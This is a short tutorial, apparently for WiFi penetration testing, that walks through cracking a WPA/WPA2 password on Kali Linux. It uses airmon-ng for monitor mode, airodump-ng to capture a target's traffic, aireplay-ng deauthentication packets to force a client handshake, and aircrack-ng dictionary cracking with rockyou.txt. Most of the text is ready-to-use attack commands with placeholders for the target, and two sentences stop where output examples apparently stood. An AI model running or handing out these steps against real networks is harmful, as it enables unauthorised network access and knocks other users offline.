Start your Kali Linux virtual machine.
Plugin your wireless adapter. (see Wireless Adapters suitable for WiFi pen-test).
Disconnect from all wireless networks.
Enable monitor mode on wireless interface
List wireless interfaces supporting monitor mode
Enable monitor mode
airmon-ng start wlan0
Scan for WiFi networks
Spot your target network in the list and note down BSSID, Channel and ESSID.
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
-c channel to listen to.
–bssid show networks, matching the given bssid.
-w the dump file prefix to use
Inject packets/Capture Handshake
Watch the airodump-ng and wait for a client to show up. Leave the airodump-ng running and open a new terminal window and execute:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
-0 number of deauth’s packets to send
-a access point router’s BSSID
-c client’s mac
Within moments you should see this message appear in the airodump-ng screen:
aircrack-ng -a2 -b [router bssid] -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap
-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID
-w wordlist/passwords list
If the password is in the wordlist, then aircrack-ng will show it like this: